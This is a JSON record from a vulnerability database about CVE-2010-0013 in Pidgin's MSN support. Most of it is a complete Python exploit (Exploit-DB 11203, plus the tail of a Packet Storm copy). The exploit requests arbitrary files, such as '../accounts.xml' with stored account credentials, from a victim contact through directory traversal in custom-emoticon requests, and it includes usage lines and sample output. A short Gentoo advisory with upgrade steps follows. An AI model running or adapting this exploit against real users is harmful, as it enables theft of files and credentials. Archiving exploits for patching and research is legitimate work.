OptionParser(usage=usage) \nparser.add_option(\"-f\", \"--file\", dest=\"filename\", default=None, \nhelp=\"File requested to remote contact\") \nparser.add_option(\"-o\", \"--output\", dest=\"output_file\", default=None, \nhelp=\"Where to write received file, STDOUT otherelse\") \nparser.add_option(\"-a\", \"--account\", dest=\"account\", default=None, \nhelp=\"MSN account to use\") \nparser.add_option(\"-c\", \"--contact\", dest=\"contact\", default=None, \nhelp=\"Contact to request file from\") \nparser.add_option(\"-l\", \"--list\", dest=\"list_only\", action=\"store_true\", default=False, \nhelp=\"Just print contact list for your account and exit\") \n \n(options, args) = parser.parse_args() \nif not options.filename or not options.account or not options.contact: \nif not (options.account and options.list_only): \nprint \"Error, parameter missing\" \nparser.print_help() \nsys.exit(-1) \n \nif options.output_file != None: \ntry: \nFD_OUT = open(options.output_file,\"wb\") \nexcept Exception,e: \nprint \"Cannot open file %s (%s)\"%(options.output_file, e) \nsys.exit(-1) \n \nMAINLOOP = gobject.MainLoop() \n \ndef sigterm_cb(): \ngobject.idle_add(quit) \n \nsignal.signal(signal.SIGTERM, sigterm_cb) \n \nlogging.basicConfig(level=logging.CRITICAL) # allows us to see the protocol debug \nserver = (SERVER_ADDRESS, SERVER_PORT) \nclient = MyClient(server, quit, options.contact, options.filename, options.list_only) \nglobal_client = client \nclient_events_handler = ClientEventHandler(client) \nprint \"Please enter the password for the account \\\"%s\\\"\"%options.account \ntry: \npasswd = getpass.getpass() \nexcept KeyboardInterrupt: \nquit() \n \nlogin_info = (options.account, passwd) \nclient.login(*login_info) \ntry: \nMAINLOOP.run() \nexcept KeyboardInterrupt: \nquit() \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/85413/pidgin_exploit.py.txt"}], "exploitdb": [{"lastseen": "2016-02-01T13:50:53", "osvdbidlist": ["61420"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Pidgin MSN <= 2.6.4 File Download Vulnerability. CVE-2010-0013. Remote exploits for multiple platform", "reporter": "Mathieu GASPARD", "published": "2010-01-19T00:00:00", "type": "exploitdb", "title": "Pidgin MSN <= 2.6.4 File Download Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2010-0013"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2010-01-19T00:00:00", "id": "EDB-ID:11203", "href": "https://www.exploit-db.com/exploits/11203/", "sourceData": "#!/usr/bin/env python \r\n\"\"\"\r\nPidgin MSN <= 2.6.4 file download vulnerability\r\n\r\n19 January 2010\r\n\r\nMathieu GASPARD (gaspmat@gmail.com)\r\n\r\n\r\nDescription:\r\n\t\tPidgin is a multi-protocol Instant Messenger.\r\n\r\n\t\tThis is an exploit for the vulnerability[1] discovered in Pidgin by Fabian Yamaguchi.\r\n\t\tThe issue is caused by an error in the MSN custom smiley feature when processing emoticon requests, \r\n\t\twhich could allow attackers to disclose the contents of arbitrary files via directory traversal attacks.\r\n\r\nAffected versions :\r\n\t\tPidgin <= 2.6.4, Adium and other IM using Pidgin-libpurple/libmsn library.\r\n\t\tPlugin msn-pecan 0.1.0-rc2 (http://code.google.com/p/msn-pecan/) IS also vulnerable even if Pidgin is up to date\r\n\r\nPlateforms :\r\n\t\tWindows, Linux, Mac\r\n\r\nFix :\r\n\t\tFixed in Pidgin 2.6.5\r\n\t\tUpdate to the latest version : http://www.pidgin.im/download/\r\n\r\nReferences :\r\n\t\t[1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0013\r\n\t\t[2] http://www.pidgin.im/news/security/?id=42\r\n\r\nUsage :\r\n\t\tYou need the Python MSN Messenger library : http://telepathy.freedesktop.org/wiki/Pymsn\r\n\t\tpython pidgin_exploit.py -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE [-o OUTPUT_FILE] [-l]\r\n\r\nExample : \r\n# python pidgin_exploit.py -a foo@hotmail.com -c victim@hotmail.com -f ../accounts.xml [-o accounts.xml]\r\n\r\n\t\t***********************************************************\r\n\r\n\t\tPidgin MSN file download vulnerability (CVE-2010-0013)\r\n\r\n\t\tUsage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l]\r\n\r\n\t\t***********************************************************\r\n\r\n\t\tPlease enter the password for the account \"foo@hotmail.com\"\r\n\t\tPassword:\r\n\t\t[+] Connecting to server\r\n\t\t[+] Authentication in progress\r\n\t\t[+] Synchronisation in progress\r\n\t\t[+] OK, all done, ready to proceed\r\n\t\t[+] Sending request for file \"../accounts.xml\" to \"victim@hotmail.com\"\r\n\t\t[+] Using session_id 974948028\r\n\t\tCurrent : 3606, total: 3881 (92%)\r\n\t\t[+] Got an answer from the contact\r\n\t\t----------------\r\n\t\t<?xml version='1.0' encoding='UTF-8' ?>\r\n\r\n\t\t<account version='1.0'>\r\n\t\t........\r\n\"\"\"\r\n\r\n\r\nimport warnings\r\nwarnings.simplefilter(\"ignore\",DeprecationWarning)\r\nimport os\r\nimport sys\r\ntry:\r\n\timport pymsn\r\nexcept ImportError:\r\n\tprint \"Pymsn couldn't be loaded\"\r\n\tprint \"On debian-like systems, the package is python-msn\"\r\n\tsys.exit(-1)\r\nimport gobject\r\nimport logging\r\nimport getpass\r\nimport hashlib\r\nfrom optparse import OptionParser\r\nimport signal\r\nimport time\r\n\r\nSERVER_ADDRESS = 'messenger.hotmail.com'\r\nSERVER_PORT = 1863\r\nFD_OUT = sys.stdout\r\nMAINLOOP = None\r\n# seconds after which, if we didn't get an answer, we quit\r\nTIMEOUT = 5\r\n\r\nglobal_client = None\r\n\r\ndef quit():\r\n\tMAINLOOP.quit()\r\n\tsys.exit(0)\r\n\t\r\n\r\ndef check_if_succeeds():\r\n\t# if False, we didn't get a chunk so we won't get any file, so we quit\r\n\tif global_client.GOT_CONTROL_BLOB == False:\r\n\t\tprint \"[+] Didn't get an answer from the client after %d seconds, it's likely not vulnerable or the file requested doesn't exist/is not accessible\"%TIMEOUT\r\n\t\tprint \"[+] Exiting\"\r\n\t\tglobal_client.quit()\r\n\r\n# called when we get the result data, after our request\r\ndef handle_answer(object, client):\r\n\tprint \"\\n[+] Got an answer from the contact\"\r\n\td = object._data\r\n\tdata = d.read()\r\n\tlength = len(data)\r\n\tFD_OUT.write(data)\r\n\t# if we wrote output to stdout, don't close it\r\n\tif FD_OUT != sys.stdout:\r\n\t\tFD_OUT.close()\r\n\t\tprint \"[+] Wrote %d bytes to file\"%length\r\n\tclient.end = time.time()\r\n\tduration = client.end - client.begin\r\n\tprint \"[+] Download lasted %d seconds at %d bytes/s \"%(duration,(length/duration))\r\n\tclient.quit()\r\n\r\ndef my_on_chunk_recv(transport, chunk):\r\n\tglobal_client._p2p_session_manager._transport_manager._on_chunk_received_OLD(transport, chunk)\r\n\tsession_id = chunk.header.session_id\r\n\tblob_id = chunk.header.blob_id\r\n\tif session_id == global_client.session_id:\r\n\t\t# first blob is control, we \"squeeze\" it and keep only the second one\r\n\t\tif global_client.GOT_CONTROL_BLOB == False:\r\n\t\t\t#print \"Got Control blob in our connection (session_id : %d, blob_id: %d)\"%(session_id, blob_id)\r\n\t\t\tglobal_client.GOT_CONTROL_BLOB = True\r\n\t\telse:\r\n\t\t\t# if connections is complete, session_id is removed from data_blobs so we have to check before accessing it\r\n\t\t\tif global_client._p2p_session_manager._transport_manager._data_blobs.has_key(session_id):\r\n\t\t\t\tcurrent_blob = global_client._p2p_session_manager._transport_manager._data_blobs[session_id]\r\n\t\t\t\tprint \"Current : %d, total: %d (%d%%)\\r\"%(current_blob.current_size, current_blob.total_size, ((current_blob.current_size*100)/current_blob.total_size)),\r\n\t\t\t\tsys.stdout.flush()\r\n\r\n\r\ndef error_handler(self, error_type, error):\r\n\t# __on_user_invitation_failed, probably because contact is offline/invisible\r\n\tif error_type == pymsn.event.ConversationErrorType.CONTACT_INVITE and \\\r\n\terror == pymsn.event.ContactInviteError.NOT_AVAILABLE:\r\n\t\tprint \"[*] ERROR, contact didn't accept our invite, probably because it is disconnected/invisible\"\r\n\t\tquit()\r\n\t# __on_message_undelivered, probably because contact is offline/invisible\r\n\tif error_type == pymsn.event.ConversationErrorType.MESSAGE and \\\r\n\terror == pymsn.event.MessageError.DELIVERY_FAILED:\r\n\t\tprint \"[*] ERROR, couldn't send message, probably because contact is disconnected/invisible\"\r\n\t\tquit()\r\n\tprint \"[*] Unhandled error, error_type : %d , error : %d\"%(error_type, error)\r\n\tquit()\r\n\t\r\nclass MyClient(pymsn.Client):\r\n\tdef __init__(self, server, quit, victim, filename, list_only, proxies={}, transport_class=pymsn.transport.DirectConnection):\r\n\t\t# callback to quit\r\n\t\tself.quit = quit\r\n\t\t# victim from whom we request the file\r\n\t\tself.victim = victim\r\n\t\t# just list contacts for this account\r\n\t\tself.list_only = list_only\r\n\t\t# file we request\r\n\t\tself.filename = filename\r\n\t\t# to calculate download duration and speed\r\n\t\tself.begin = 0\r\n\t\tself.end = 0\r\n\t\t# session_id of the connection to retrieve the file\r\n\t\tself.session_id = 0\r\n\t\t# have we already seen the \"control blob\" for this connection\r\n\t\tself.GOT_CONTROL_BLOB = False\r\n\t\tpymsn.Client.__init__(self, server)\r\n\t\t# REALLY REALLY HACKISH\r\n\t\t# if contact is disconnected/invisible, a \"NotImplementedError\" exception is raised\r\n\t\t# and it can't be caught AFAIK so it needs to be redefined here\r\n\t\t# handler_class should be SwitchboardClient\r\n\t\tfor handler_class, extra_args in self._switchboard_manager._handlers_class:\r\n\t\t\thandler_class._on_error = error_handler\r\n\r\n\r\n\r\nclass MyMSNObjectStore(pymsn.p2p.MSNObjectStore):\r\n\tdef __compute_data_hash(self, data):\r\n\t\tdigest = hashlib.sha1()\r\n\t\tdata.seek(0, 0)\r\n\t\tread_data = data.read(1024)\r\n\t\twhile len(read_data) > 0:\r\n\t\t\tdigest.update(read_data)\r\n\t\t\tread_data = data.read(1024)\r\n\t\tdata.seek(0, 0)\r\n\t\treturn digest.digest()\r\n\r\n\t# need to compute the SHA hash (SHAd in MSNObject) otherelse the function in MSNObjectStore complains because\r\n\t# the hash of the data we receive is not the hash we expected (hash we expect is the one we send, which is always the same here)\r\n\tdef _outgoing_session_transfer_completed(self, session, data):\r\n\t\thandle_id, callback, errback, msn_object = self._outgoing_sessions[session] \r\n\t\tmsn_object._data_sha = self.__compute_data_hash(data) \t \r\n\t\tsuper(MyMSNObjectStore, self)._outgoing_session_transfer_completed(session, data)\r\n\r\nclass ClientEventHandler(pymsn.event.ClientEventInterface):\r\n\t\t\t\r\n\tdef on_client_error(self, error_type, error):\r\n\t\tif error_type == pymsn.event.ClientErrorType.AUTHENTICATION:\r\n\t\t\t print \"[+] Authentication failed, bad login/password\"\r\n\t\t\t self._client.quit()\r\n\t\telse:\r\n\t\t\t print \"[*] ERROR :\", error_type, \" ->\", error\r\n\t\t\t \r\n\tdef on_client_state_changed(self, state):\r\n\t\t#print \"State changed to %s\" % state\r\n\t\tif state == pymsn.client.ClientState.CLOSED:\r\n\t\t\tprint \"[+] Connection to server closed\"\r\n\t\t\tself._client.quit()\r\n \r\n\t\tif state == pymsn.client.ClientState.CONNECTING:\r\n\t\t\tif self.current_state != state:\r\n\t\t\t\tprint \"[+] Connecting to server\"\r\n\t\t\tself.current_state = state\r\n\t\tif state == pymsn.client.ClientState.AUTHENTICATING:\r\n\t\t\tif self.current_state != state:\r\n\t\t\t\tprint \"[+] Authentication in progress\"\r\n\t\t\tself.current_state = state\r\n\t\tif state == pymsn.client.ClientState.SYNCHRONIZING:\r\n\t\t\tif self.current_state != state:\r\n\t\t\t\tprint \"[+] Synchronisation in progress\"\r\n\t\t\tself.current_state = state\r\n\r\n\t\tif state == pymsn.client.ClientState.OPEN:\r\n\t\t\tprint \"[+] OK, all done, ready to proceed\"\r\n\t\t\tself._client.profile.presence = pymsn.Presence.INVISIBLE\r\n\t\t\tcontact_dict = {}\r\n\t\t\tfor i in self._client.address_book.contacts:\r\n\t\t\t\tcontact_dict[i.account] = i\r\n\t\t\tif self._client.list_only:\r\n\t\t\t\tfor (k,v) in contact_dict.items():\r\n\t\t\t\t\tprint k+\" (\"+v.display_name+\")\"\r\n\t\t\t\tself._client.quit()\r\n\t\t\telse:\r\n\t\t\t\tif self._client.victim not in contact_dict.keys():\r\n\t\t\t\t\tprint \"[*] Error, contact %s not in your contact list\"%self._client.victim\r\n\t\t\t\t\tself._client.quit()\r\n\t\t\t\telse: \r\n\t\t\t\t\tcontact = contact_dict[self._client.victim]\r\n\t\t\t\t\tstore = MyMSNObjectStore(self._client)\r\n\t\t\t\t\tobject = pymsn.p2p.MSNObject(contact, 65535, pymsn.p2p.MSNObjectType.CUSTOM_EMOTICON, self._client.filename, 'AAA=','2jmj7l5rSw0yVb/vlWAYkK/YBwk=')\r\n\t\t\t\t\tprint \"[+] Sending request for file \\\"%s\\\" to \\\"%s\\\"\"%(self._client.filename, self._client.victim)\r\n\t\t\t\t\tself._client.begin = time.time()\r\n\t\t\t\t\tstore.request(object, [handle_answer, self._client])\r\n\t\t\t\t\t# at this moment, we got only one session_id, the one we will use to request the file\r\n\t\t\t\t\tfor k in store._outgoing_sessions.keys():\r\n\t\t\t\t\t\tprint \"[+] Using session_id %d\"%k._id\r\n\t\t\t\t\t\tself._client.session_id = k._id\r\n\t\t\t\t\t# hack to set up my own callback each time we receive a chunk, used to print the percentage of the download\r\n\t\t\t\t\tself._client._p2p_session_manager._transport_manager._on_chunk_received_OLD = self._client._p2p_session_manager._transport_manager._on_chunk_received\r\n\t\t\t\t\tself._client._p2p_session_manager._transport_manager._on_chunk_received = my_on_chunk_recv\r\n\t\t\t\t\t# if no file transfer received from the victim after TIMEOUT seconds, quit\r\n\t\t\t\t\tgobject.timeout_add(TIMEOUT*1000, check_if_succeeds)\r\n\r\n\tdef __init__(self, client):\r\n\t\tself.current_state = None\r\n\t\tpymsn.event.ClientEventInterface.__init__(self, client)\r\n\r\n\r\nif __name__ == '__main__':\r\n\tprint \"***********************************************************\\n\"\r\n\tprint \"Pidgin MSN file download vulnerability (CVE-2010-0013)\\n\"\r\n\tprint \"Usage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l]\\n\"\r\n\tprint \"***********************************************************\\n\"\r\n\r\n\tusage = \"Usage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l] \"\r\n\tparser = OptionParser(usage=usage)\r\n\tparser.add_option(\"-f\", \"--file\", dest=\"filename\", default=None,\r\n\t\t\t\t\t help=\"File requested to remote contact\")\r\n\tparser.add_option(\"-o\", \"--output\", dest=\"output_file\", default=None,\r\n\t\t\t\t\t help=\"Where to write received file, STDOUT otherelse\")\r\n\tparser.add_option(\"-a\", \"--account\", dest=\"account\", default=None,\r\n\t\t\t\t\t help=\"MSN account to use\")\r\n\tparser.add_option(\"-c\", \"--contact\", dest=\"contact\", default=None,\r\n\t\t\t\t\t help=\"Contact to request file from\")\r\n\tparser.add_option(\"-l\", \"--list\", dest=\"list_only\", action=\"store_true\", default=False,\r\n\t\t\t\t\t help=\"Just print contact list for your account and exit\")\r\n\t\r\n\t(options, args) = parser.parse_args()\r\n\tif not options.filename or not options.account or not options.contact:\r\n\t\tif not (options.account and options.list_only):\r\n\t\t\tprint \"Error, parameter missing\"\r\n\t\t\tparser.print_help()\r\n\t\t\tsys.exit(-1)\r\n\r\n\tif options.output_file != None:\r\n\t\ttry:\r\n\t\t\tFD_OUT = open(options.output_file,\"wb\")\r\n\t\texcept Exception,e:\r\n\t\t\tprint \"Cannot open file %s (%s)\"%(options.output_file, e)\r\n\t\t\tsys.exit(-1)\r\n\r\n\tMAINLOOP = gobject.MainLoop()\r\n\r\n\tdef sigterm_cb():\r\n\t\tgobject.idle_add(quit)\r\n\r\n\tsignal.signal(signal.SIGTERM, sigterm_cb)\r\n\r\n\tlogging.basicConfig(level=logging.CRITICAL) # allows us to see the protocol debug\r\n\tserver = (SERVER_ADDRESS, SERVER_PORT)\r\n\tclient = MyClient(server, quit, options.contact, options.filename, options.list_only)\r\n\tglobal_client = client\r\n\tclient_events_handler = ClientEventHandler(client)\r\n\tprint \"Please enter the password for the account \\\"%s\\\"\"%options.account\r\n\ttry:\r\n\t\tpasswd = getpass.getpass()\r\n\texcept KeyboardInterrupt:\r\n\t\tquit()\r\n\r\n\tlogin_info = (options.account, passwd)\r\n\tclient.login(*login_info)\r\n\ttry:\r\n\t\tMAINLOOP.run()\r\n\texcept KeyboardInterrupt:\r\n\t\tquit()\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/11203/"}], "gentoo": [{"lastseen": "2016-09-06T19:46:34", "references": ["http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3594", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2485", "https://bugs.gentoo.org/show_bug.cgi?id=385073", "https://bugs.gentoo.org/show_bug.cgi?id=372785", "https://bugs.gentoo.org/show_bug.cgi?id=299751", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0013"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "2.10.0-r1", "arch": "all", "packageFilename": "UNKNOWN", "packageName": "net-im/pidgin", "operator": "lt"}], "edition": 1, "description": "### Background\n\nPidgin is an GTK Instant Messenger client.\n\n### Description\n\nMultiple vulnerabilities have been discovered in Pidgin. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nThese vulnerabilities allow for arbitrary file retrieval, Denial of Service and arbitrary code execution with the privileges of the user running Pidgin. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Pidgin users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-im/pidgin-2.10.0-r1\"", "reporter": "Gentoo Foundation", "published": "2012-06-21T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "gentoo", "title": "Pidgin: Multiple vulnerabilities", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3594", "CVE-2011-2485", "CVE-2010-0013"], "modified": "2012-06-21T00:00:00", "id": "GLSA-201206-11", "href": "https://security.gentoo.org/glsa/201206-11", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}]}